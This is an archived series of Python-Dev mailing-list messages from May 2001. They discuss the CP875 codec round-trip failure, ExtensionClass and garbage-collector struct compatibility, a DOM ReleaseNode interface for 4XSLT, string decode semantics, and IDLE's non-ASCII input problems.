So the practical hack for now is to exclude cp875 from the earlier range(128) roundtrip test too. > (is Jython using exactly the same hashing and dictionary algorithms as > CPython? or does it work by accident also under Jython?) Sorry, no idea.
Attempting to browse the Jython source on SourceForge caused this cute behavior: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/

    Python Exception Occurred
    Traceback (innermost last):
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ?
        main()
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main
        view_directory(request)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory
        fileinfo, alltags = get_logs(full_name, rcs_files, view_tag)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs
        raise 'error during rlog: '+hex(status)
    error during rlog: 0x100

let's-rewrite-it-in-php-ly y'rs - tim

ENCODING_DIR = "../Lib/encodings"

import os
import imp

def d(w):
    if type(w) is type(6):
        return hex(w)
    else:
        return repr(w)

encfiles = [name for name in os.listdir(ENCODING_DIR)
                 if name.endswith(".py") and name[0] != "_"]

for fname in encfiles:
    path = os.path.join(ENCODING_DIR, fname)
    f = open(path)
    module = imp.load_source(fname[:-3], path, f)
    f.close()
    decode = getattr(module, "decoding_map", None)
    if decode is None:
        print fname, "doesn't have decoding_map."
        continue
    vtok = {}
    for k, v in decode.items():
        if v in vtok:
            vtok[v].append(k)
        else:
            vtok[v] = [k]
    ambiguous = [(v, ks) for v, ks in vtok.items() if len(ks) > 1]
    if ambiguous:
        for v, ks in ambiguous:
            ks.sort()
            print "***", fname, "maps", d(v), "back to", \
                  ", ".join(map(d, ks))
    else:
        print fname, "is free of ambiguous reverse maps."

From tim.one@home.com Sat May 12 22:48:38 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 12 May 2001 17:48:38 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, whose encyclopedic knowledge of encoding details still isn't enough to get a clear answer (it's like somebody asking me for a simple answer to a floating point question ] > ... > So I think we can take one of two approaches: > > 1.
admit that CP 875 is not round-trippable, and exclude it from the > test (although when looking at the first 128 characters only, it > is round-trippable). As I noted later, 875 is already excluded from the roundtrip test across range(128, 256). What it's failing is the roundtrip test across range(128): after unicode("?", "cp875") produces u'\x1a', the following .encode('cp875') has no way to know which byte the original input came from. So it's not really round-trippable across range(128) either unless more info is given to .encode(). > 2. remove the SUBSTITUTE mappings from CP875, acknowledging that > apparently these characters have no meaning in that code page. > Unfortunately, I could not find any official IBM documentation > page that lists the characters supported in each of the EBCDIC > code pages. > > The second seems to be more correct to me, although it is a deviation > from the Unicode Consortium publications. Until you and MAL agree on the best thing to do (I have no opinion: my only exposure to Unicode in daily programming life remains the Python test suite), I'm going to opt for #1: as cp875.py stands today, it's simply a fact that it's not round-trippable across any range including 0x3f. From martin@loewis.home.cs.tu-berlin.de Sat May 12 23:32:10 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v.
Loewis) Date: Sun, 13 May 2001 00:32:10 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> > Now, if you are using the 1.4 version of ExtensionClasses you might > not have the tp_flags field either (I don't know, I can't easily > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > even require recompilation to work with Python 2.1. I'll attach a copy below of the struct as defined in pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension classes). As you can see, it does not provide tp_flags, but has a field of tp_xxx4 for it. That *should* work, except that it also has its 'methods' field where tp_traverse would go, and its class_flags field where tp_clear would go. Now, you write > ExtensionClasses (at least recent versions that worked with 1.5.2) > contain a copy of the type object up to and including the tp_flags > field, and the 2.1 code is careful not to use any newer fields > without first checking the corresponding flag bit. In this generality, it is apparently not true: Modules/gcmodule.c has, in delete_garbage,

    if ((clear = op->ob_type->tp_clear) != NULL) {
    ...
    traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
    (void) traverse(PyObject_FROM_GC(gc),
                    (visitproc)visit_decref,
                    NULL);

which does not check any flags. That still shouldn't cause any problems, since the Gtk objects should never end up in the GC lists - but maybe I'm missing something.
Regards, Martin

typedef struct {
    PyObject_VAR_HEAD
    char *tp_name; /* For printing */
    int tp_basicsize, tp_itemsize; /* For allocation */

    /* Methods to implement standard operations */
    destructor tp_dealloc;
    printfunc tp_print;
    getattrfunc tp_getattr;
    setattrfunc tp_setattr;
    cmpfunc tp_compare;
    reprfunc tp_repr;

    /* Method suites for standard classes */
    PyNumberMethods *tp_as_number;
    PySequenceMethods *tp_as_sequence;
    PyMappingMethods *tp_as_mapping;

    /* More standard operations (at end for binary compatibility) */
    hashfunc tp_hash;
    ternaryfunc tp_call;
    reprfunc tp_str;
    getattrofunc tp_getattro;
    setattrofunc tp_setattro;

    /* Space for future expansion */
    long tp_xxx3;
    long tp_xxx4;

    char *tp_doc; /* Documentation string */

#ifdef COUNT_ALLOCS
    /* these must be last */
    int tp_alloc;
    int tp_free;
    int tp_maxalloc;
    struct _typeobject *tp_next;
#endif
    PyMethodChain methods;
    long class_flags;
    PyObject *class_dictionary;
    PyObject *bases;
    PyObject *reserved;
} PyExtensionClass;

From martin@loewis.home.cs.tu-berlin.de Sun May 13 13:08:02 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 14:08:02 +0200 Subject: [Python-Dev] ReleaseNode interface in 4XSLT Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Currently, 4XSLT has a dependency on the DOM implementation in terms of memory management (among other dependencies). I'd like to reduce this dependency, by providing a centralized function that knows how to release nodes.
In PyXML, I currently use

# Define ReleaseNode in a DOM-independent way
import xml.dom.ext
import xml.dom.minidom
def _releasenode(n):
    if isinstance(n, xml.dom.minidom.Node):
        n.unlink()
    else:
        xml.dom.ext.ReleaseNode(n)

try:
    from Ft.Lib import pDomlette
    def ReleaseNode(n):
        if isinstance(n, pDomlette.Node):
            pDomlette.ReleaseNode(n)
        else:
            _releasenode(n)
    _XsltElementBase = pDomlette.Element
except ImportError:
    ReleaseNode = _releasenode
    from minisupport import _XsltElementBase

This code knows how to release minidom, 4DOM, and pDomlette nodes, and supports installations without 4Suite (i.e. without pDomlette). I've put this into xslt/__init__.py, so that all callers of Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. If desired, I could produce a patch against the public Ft CVS. As a slightly independent question, such a function also ought to support DOM implementations not known to it; I'm thinking in particular of the Zope DOMs. I'd like to hear proposals on how such an interface should work; I see three options:

a) it is an operation on the document node (or any node), as in minidom.
b) it is an operation on the DOM implementation (almost as in 4Suite; you'd need to navigate from the node to the implementation, then you'd need a well-known operation on the implementation)
c) the code assumes that no release activity is necessary for unknown DOMs, effectively believing in reference counting, garbage collection, acquisition, and other black art.

Any comments appreciated, in particular

1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
2. from authors of other DOMs on a general memory management API for Python DOM.

Regards, Martin From mwh@python.net Sun May 13 13:36:26 2001 From: mwh@python.net (Michael Hudson) Date: 13 May 2001 13:36:26 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A.
Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Fredrik Lundh wrote: > > can you take that again? shouldn't michael's example be > > equivalent to: > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > if not, I'd argue that your "decode" design is broken, instead > > of just buggy... > > Well, it is sort of broken, I agree. The reason is that > PyString_Encode() and PyString_Decode() guarantee the returned > object to be a string object. To be able to reuse Unicode codecs > I added code which converts Unicode back to a string in case the > codec return an Unicode object (which the .decode() method does). > This is what's failing. It strikes me that if someone executes aString.decode("latin-1") they're going to expect a unicode string. AIUI, what's currently happening is that the string is converted from a latin-1 8-bit string to the 16-bit unicode string I expected and then there is an attempt to convert it back to an 8-bit string using the default encoding. So if I'd done a sys.setdefaultencoding("latin-1") in my sitecustomize.py, then aString.decode("latin-1") would just be aString again? This doesn't seem optimal. > Perhaps I should simply remove the restriction and have both APIs > return the codec's return object as-is ?! (I would be in favour of > this, but I'm not sure whether this is already in use by someone...) Are all the codecs distributed with Python 2.1 unicode-related? If that's the case, PyString_Decode isn't terribly useful, is it? It seems unlikely that it received much use. Could be wrong of course. OTOH, maybe I'm trying to wedge too much behaviour onto a particular operation.
Do we want open(file).read().decode("jpeg") -> some kind of PIL object to be possible? Cheers, M. -- GET *BONK* BACK *BONK* IN *BONK* THERE *BONK* -- Naich using the troll hammer in cam.misc From mal@lemburg.com Sun May 13 17:53:55 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 18:53:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: <3AFEBC22.1F0AF685@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Fredrik Lundh wrote: > > > can you take that again? shouldn't michael's example be > > > equivalent to: > > > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > > > if not, I'd argue that your "decode" design is broken, instead > > > of just buggy... > > > > Well, it is sort of broken, I agree. The reason is that > > PyString_Encode() and PyString_Decode() guarantee the returned > > object to be a string object. To be able to reuse Unicode codecs > > I added code which converts Unicode back to a string in case the > > codec return an Unicode object (which the .decode() method does). > > This is what's failing. > > It strikes me that if someone executes > > aString.decode("latin-1") > > they're going to expect a unicode string. AIUI, what's currently > happening is that the string is converted from a latin-1 8-bit string > to the 16-bit unicode string I expected and then there is an attempt > to convert it back to an 8-bit string using the default encoding. So > if I'd done a > > sys.setdefaultencoding("latin-1") > > in my sitecustomize.py, then aString.decode("latin-1") would just be > aString again? This doesn't seem optimal. 
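The double conversion described above, and the alternative of returning whatever the codec produces, can be modelled in modern Python, where `bytes` plays the role of the 8-bit string and `str` the role of the Unicode object. `CODECS`, `decode_forcing_bytes` and `decode_as_is` are hypothetical names for this sketch; it does not go through Python's real codec registry.

```python
import gzip

# Hypothetical codec table: name -> (encode, decode).
CODECS = {
    "latin-1": (lambda text: text.encode("latin-1"),
                lambda data: data.decode("latin-1")),
    "gzip": (gzip.compress, gzip.decompress),
}


def decode_forcing_bytes(data, name, default_encoding="ascii"):
    """Model of the behaviour described above: a text result from the codec
    is converted back to an 8-bit string with the default encoding."""
    result = CODECS[name][1](data)
    if isinstance(result, str):
        result = result.encode(default_encoding)
    return result


def decode_as_is(data, name):
    """The proposed behaviour: return the codec's result unchanged."""
    return CODECS[name][1](data)


print(repr(decode_as_is(b"\xe3", "latin-1")))                     # 'ã'
print(repr(decode_forcing_bytes(b"\xe3", "latin-1", "latin-1")))  # b'\xe3'
try:
    decode_forcing_bytes(b"\xe3", "latin-1")  # default encoding is ASCII
except UnicodeEncodeError as exc:
    print("fails:", exc.reason)               # fails: ordinal not in range(128)
print(decode_as_is(gzip.compress(b"long data"), "gzip"))          # b'long data'
```

With a Latin-1 default encoding the forced path hands back the input unchanged, which is the surprise raised in the message above. Returning the codec's object as-is also accommodates string-to-string codecs such as the gzip entry.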
True and that's why I am proposing to loosen the restriction on having the two APIs returning strings only. > > Perhaps I should simply remove the restriction and have both APIs > > return the codec's return object as-is ?! (I would be in favour of > > this, but I'm not sure whether this is already in use by someone...) > > Are all the codecs distributed with Python 2.1 unicode-related? If > that's the case, PyString_Decode isn't terribly useful, is it? It > seems unlikely that it received much use. Could be wrong of course. All standard codecs in 2.0 and 2.1 are Unicode-related. I am planning to write up a bunch of string-to-string codecs next week though, which will then be the first non-Unicode-related codecs in 2.2. > OTOH, maybe I'm trying to wedge too much behaviour onto a particular > operation. Do we want > > open(file).read().decode("jpeg") -> some kind of PIL object > > to be possible? This would be possible indeed. Even though some may find this coding style obscure, I think this technique has the same usefulness as e.g. piping at OS level. I am thinking of these use cases:

    "äöü".decode("latin-1") -> Unicode (object construction)
    "...jpeg data...".decode("jpeg") -> JpegImage object (ditto)
    "äöü".decode("latin-1").encode("cp1521") -> string (recoding data)
    "...long data...".encode("gzip") -> string (transfer encoding)
    "...gzipped data...".decode("gzip") -> string (transfer decoding)

-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Sun May 13 18:20:01 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:20:01 +0200 Subject: [Python-Dev] Re: Ill-defined encoding for CP875? References: Message-ID: <3AFEC241.62084286@lemburg.com> Tim Peters wrote: > > I have a way to make dict lookup a teensy bit cheaper(*) that significantly > reduces the number of collisions (which is much more valuable).
>
> This caused a number of std tests to fail, because they were implicitly
> relying on the order in which a dict's entries are materialized via .keys()
> or .items().
>
> Most of these were easy enough to fix. The last failure remaining is
> test_unicode, and I don't know how to fix it. It's dying here:
>
>     try:
>         verify(unicode(s,encoding).encode(encoding) == s)
>     except TestFailed:
>         print '*** codec "%s" failed round-trip' % encoding
>     except ValueError,why:
>         print '*** codec for "%s" failed: %s' % (encoding, why)
>
> when encoding == "cp875". There's a bogus problem you have to worm around
> first: test_unicode neglected to import TestFailed, so it actually dies
> with NameError while trying the "except TestFailed" clause after verify()
> raises TestFailed. Once that's repaired, it's complaining about failing the
> round-trip encoding.

Ooops; this must have been caused by the assert statement removal in the test suite I hacked up some months ago. Funny that it never showed up... the code seems to be very robust ;-)

> The original character in s it's griping about is "?" (0x3f). cp875.py has
> this entry in its decoding_map dict:
>
>         0x003f: 0x001a,     # SUBSTITUTE
>
> But 0x1a is not a *unique* value in this dict. There's also
>
>         0x00dc: 0x001a,     # SUBSTITUTE
>         0x00e1: 0x001a,     # SUBSTITUTE
>         0x00ec: 0x001a,     # SUBSTITUTE
>         0x00ed: 0x001a,     # SUBSTITUTE
>         0x00fc: 0x001a,     # SUBSTITUTE
>         0x00fd: 0x001a,     # SUBSTITUTE
>
> Therefore what appears associated with 0x1a in the derived encoding_map
> dict:
>
>     encoding_map = {}
>     for k,v in decoding_map.items():
>         encoding_map[v] = k
>
> may end up being any of the 7 decoding_map keys that map to 0x1a. It just
> so happened to map back to 0x3f before, but to 0xfd after the dict change,
> so "?" doesn't survive the round trip anymore.

The "right" thing to do here is to simply remove cp875 from the test for round-tripping.
It is not the only encoding which fails this test, but it's not our fault: the codecs were all generated from the original codec maps at the Unicode.org site. If their mappings are broken, we can't do much about it... other than to ignore the error or remove the codec altogether. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Sun May 13 18:40:58 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:40:58 +0200 Subject: [Python-Dev] IDLE and non-ASCII characters References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <3AFEC72A.33076220@lemburg.com> Martin von Loewis wrote: > > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='äö' > UnicodeError: ASCII encoding error: ordinal not in range(128) > > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. > > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. > > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. I have a bug report assigned to myself which indicates similar problems with _tkinter and Tk/Tcl. There were other problem reports on the German Python mailing list going in the same direction too. The basic problem seems to be that Tk/Tcl applies too much magic to the text widget contents in order to find out the used encoding and this can easily cause the whole encoding mechanism to fail. 
A Tk/Tcl expert should really look into this and fix _tkinter.c to aid Tk/Tcl in not mixing up the encodings (e.g. it would probably be a good idea to recode Python 8bit-strings into whatever encoding Tk/Tcl assumes as default). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From Mike.Olson@fourthought.com Sun May 13 19:15:46 2001 From: Mike.Olson@fourthought.com (Mike Olson) Date: Sun, 13 May 2001 12:15:46 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Message-ID: <3AFECF52.FF7E9B26@FourThought.com> "Martin v. Loewis" wrote: > > > In PyXML, I currently use > > # Define ReleaseNode in a DOM-independent way > import xml.dom.ext > import xml.dom.minidom > def _releasenode(n): > if isinstance(n, xml.dom.minidom.Node): > n.unlink() > else: > xml.dom.ext.ReleaseNode(n) > > try: > from Ft.Lib import pDomlette > def ReleaseNode(n): > if isinstance(n, pDomlette.Node): > pDomlette.ReleaseNode(n) > else: > _releasenode(n) > _XsltElementBase = pDomlette.Element > except ImportError: > ReleaseNode = _releasenode > from minisupport import _XsltElementBase > > This code knows how to release minidom, 4DOM, and pDomlette nodes, and > supports installations without 4Suite (i.e. without pDomlette). I've > put this into xslt/__init__.py, so that all callers of > Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. > If desired, I could produce a patch against the public Ft CVS. What if we put these on the implementation, that or came up with a standard interface on the node. Then, every DOM imp that wants to be compatible with xpath/xslt needs to support this interface? 
node.ownerDocument.implementation.releaseNode(node) or node.py_unlink() > > As a slightly independent question, such a function also ought to > support DOM implementations not known to it; I'm thinking in > particular of the Zope DOMs. I'd like to hear proposals on how such an > interface should work; I see three options: See above > > a) it is an operation on the document node (or any node), as in minidom. > b) it is an operation on the DOM implementation (almost as in 4Suite; > you'd need to navigate from the node to the implementation, then > you'd need a well-known operation on the implementation) > c) the code assumes that no release activity is necessary for unknown > DOMs, effectively believing in reference counting, garbage collection, > acquisition, and other black art. I like either a or b Mike > > Any comments appreciated, in particular > 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and > 2. from authors of other DOMs on a general memory management API for > Python DOM. > > Regards, > Martin > > _______________________________________________ > 4suite mailing list > 4suite@lists.fourthought.com > http://lists.fourthought.com/mailman/listinfo/4suite -- Mike Olson Principal Consultant mike.olson@fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one@home.com Sun May 13 19:31:42 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 13 May 2001 14:31:42 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFEC241.62084286@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > The "right" thing to do here, is to simply remove cp875 > from the test for round-tripping. I'm relieved you think so, since that's what I already did . > It is not the only encoding which fails this test, but it's not > our fault: the codecs were all generated from the original codec > maps at the Unicode.org site. 
> > If their mappings are broken, we can't do much about it... other > than to ignore the error or remove the codec altogether. On general principle I don't like either of those -- "in the face of ambiguity, refuse the temptation to guess". It's at least surprising to see >>> unicode("?", "cp875").encode("cp875") '\xfd' >>> now, yes? Would it be better if an ambiguous encoding raised an exception in "strict" mode? That is, a third choice is to alert users when they're relying on a broken part of a mapping. From martin@loewis.home.cs.tu-berlin.de Sun May 13 20:08:47 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 21:08:47 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 12:15:46 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> > What if we put these on the implementation, that or came up with a > standard interface on the node. Then, every DOM imp that wants to be > compatible with xpath/xslt needs to support this interface? > > > node.ownerDocument.implementation.releaseNode(node) > > or > > node.py_unlink() releaseNode sounds good to me; it is unlikely that W3C would give an operation that name but a different meaning. Any objections? 
Regards, Martin From tim.one@home.com Sun May 13 20:45:40 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 13 May 2001 15:45:40 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: > http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465& > group_id=5470 > > Category: core (C code) > Group: None > >Status: Closed > >Resolution: Accepted > Priority: 5 > Submitted By: Mark Hammond (mhammond) > Assigned to: Mark Hammond (mhammond) > Summary: Allow pre-encoded strings as filenames > > Initial Comment: > This patch enables most filename parameters to use pre- > encoded strings. On Windows, the default of "mbcs" is > used. On all other platforms, the default filename > encoding is the same as the general default encoding, > which in reality means there is no functional change. > However, other platforms can simply plugin their own > encodings. > ... Mark (or anyone else who understands all this), were doc changes included? Can someone please add a briefer user-oriented blurb to Misc/NEWS too? From tim.one@home.com Sun May 13 21:54:50 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 13 May 2001 16:54:50 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid> Message-ID: [/F] > as a footnote, SRE uses the same source code to generate > both 8-bit and 16-bit versions of the match engine. I see no > reason why we cannot do the same for the string operations > (PyString, PyUnicode, and strop). > > if anyone wants me to look into this, just say "go ahead". go ahead Here's another idea: whenever we fix or extend Python's "%" formats, it requires changes in both stringobject.c and unicodeobject.c, but they've diverged in irritating ways that make it a fresh adventure in each.
In the early days, Python handled % formats pretty much by just building a format string and passing that on to C's sprintf. But as the years have gone by, and the number of buggy platforms increased, Python has taken over more & more of it itself. For example, it doesn't trust sprintf to deal with justification, 0-fill or blank-fill, and needed to grow its own from-scratch code for integer conversion in order to handle Python longs. In addition, it also grew a PyErr_Format() routine as yet another layer of simulating what a safe sprintf-alike should do. Even with all that, we've still got platform bugs due to, e.g., platform %#x and %#o conversion adding base markers when "they shouldn't" (according to C), or not adding them when "they should" (according to Python). All in all, the code would be simpler and quicker now if we left the platform sprintf out of sprintf operations entirely . The only thing we're not simulating ourselves is float->string conversion. Unfortunately, we can't do that without also doing string->float, because platforms vary in the float strings they can read back (e.g., if Python does float->string and produces "Inf" for positive infinity, but uses strtod or atof to read floats back in, it's a x-platform crapshoot whether "Inf" can be read back in). but-in-favor-of-merging-the-code-even-without-that-ly y'rs - tim From tim.one@home.com Sun May 13 22:00:32 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 13 May 2001 17:00:32 -0400 Subject: [Python-Dev] test___all__ failing on WIndows In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com> Message-ID: [skip@pobox.com] > I (thankfully) gave up even pretending to run Windows recently, so > I can only make a suggestion for others who look into this problem. > Try this: > Change test___all__.check_all so that the except clause reads: > > except ImportError, msg: > > then print out msg when an import fails. You should get the actual > module that failed to import. 
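Here is Skip's suggestion written out as a standalone helper in modern syntax (`except ImportError as msg`). This is a sketch, not the actual test___all__ code. check_all here is a hypothetical function that returns a list of problems rather than raising. The useful part is printing the ImportError message. It shows which module was actually missing, which can be a dependency rather than the module being checked.

```python
import importlib


def check_all(modname):
    """Import modname and check that every name in its __all__ is defined.

    Returns a list of problem descriptions (empty if all is well) instead of
    raising, so one broken module does not hide the others.
    """
    try:
        module = importlib.import_module(modname)
    except ImportError as msg:
        # Report the message itself: it names the module that was really
        # missing, which may be a dependency rather than modname.
        return ["import of %s failed: %s" % (modname, msg)]
    return ["%s.__all__ lists undefined name %r" % (modname, name)
            for name in getattr(module, "__all__", ())
            if not hasattr(module, name)]


for name in ["json", "no_such_module_xyz"]:
    print(name, check_all(name) or "OK")
```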
Yes, that confirmed termios was the culprit. Thanks! Fixed by adding import termios del termios in pty.py. As the irritated comment before this new code says, this is absurd. since-you're-on-a-roll-how-about-fixing-test_urllib2-too-ly y'rs - tim From guido@digicool.com Sun May 13 23:26:39 2001 From: guido@digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:26:39 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200." <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com> > > Now, if you are using the 1.4 version of ExtensionClasses you might > > not have the tp_flags field either (I don't know, I can't easily > > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > > even require recompilation to work with Python 2.1. > > I'll attach a copy below of the struct as defined in > pygtk-0.7.0-unstable-dont-use.tar.gz Hmm... I like that filename. :-) > (0.6.6 does not use extension > classes). As you can see, it does not provide tp_flags, but has a > field of tp_xxx4 for it. Sorry, that's what I meant. This is guaranteed to be initialized to 0 (unless a module goes out of its way to put a value in it, in which case they deserve what they get). > That *should* work, except that it also has its 'methods' field where > tp_traverse would go, and its class_flags field where tp_clear would > go. > > Now, you write > > > ExtensionClasses (at least recent versions that worked with 1.5.2) > > contain a copy of the type object up to and including the tp_flags > > field, and the 2.1 code is careful not to use any newer fields > > without first checking the corresponding flag bit. 
> > In this generality, it is apparently not true: Modules/gcmodule.c has, > in delete_garbage, > > if ((clear = op->ob_type->tp_clear) != NULL) { > ... > traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse; > (void) traverse(PyObject_FROM_GC(gc), > (visitproc)visit_decref, > NULL); > > which does not check any flags. That still shouldn't cause any > problems, since the Gtk objects should never end up in the GC lists - > but may be I'm missing something. I agree with your analysis: op here is gotten from a PyGC_Head, so it cannot be a PyExtensionClass instance, so Neil's code should be safe. Objects never have a GC head unless they specifically request it; PyExtensionClass certainly doesn't request a GC head. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Sun May 13 23:37:44 2001 From: guido@digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:37:44 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400." References: Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com> > As I said earlier: the only advantage would be if it could simplify > things "under the hood" (compared to metaclasses) but could still > provide the same Class semantics (with maybe a "proto" declaration > sneaking it's nose in under the tent.) > But I have no immediate idea on how to do that, and it sounds like > you're pretty far along into an implementation already. I don't know how to do it either, but I suspect it wouldn't be easy. > I guess my practical quesion, which I meant to ask before I got > myself sidetracked into preaching prototypes is: How much of the > existing plumbing (specifically the Don Beaudry hack) can I rely > on in the future for the objective-C/python bridge ? > With BOOST and Zope's extension classes relying on it, can I > assume that it's being extended rather than replaced ? > ( I guess I ought to take a look at the code! 
) I'm currently not too concerned with backwards compatibility, and Jim Fulton has proclaimed that he would prefer to get rid of ExtensionClassess (since what I'm building goes way beyond them!), so I'm not sure I can be motivated to support just for BOOST's sake. There will be a replacement mechanism that will be at least as powerful, and I'm sure that BOOST etc. can be rewritten to use the new mechanism easily. That's what we're planning for Zope. > Guido: did you ever imagine back at that first workshop at NIST > that you and Python would be where you are today ? No way! I knew I was on to something, but I had no idea onto what... I'll always hold on to the T-shirt you made. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Sun May 13 23:43:57 2001 From: guido@digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:43:57 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200." <00ca01c0da68$4fc66570$e46940d5@hagrid> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> <00ca01c0da68$4fc66570$e46940d5@hagrid> Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com> > 2.2 is to be released in october, right? I'm sure I could shake > out the remaining bugs in my "stackless SRE" patch until then... Knowing you that means you'd start working on them late September. :-) There's actually a possibility that if my types/classes stuff goes well, Digital Creations will ask for a 2.2 release sooner (e.g. July). This might have an experimental status, e.g. it might not be backwards compatible, but it would be the version required by Zope 2.4. On the other hand, none of that may happen, or that release would be labeled 2.2b1 or something, or Zope 2.4 might come out after October. What I'm trying to say is, please try to fix stackless SRE sooner rather than later! 
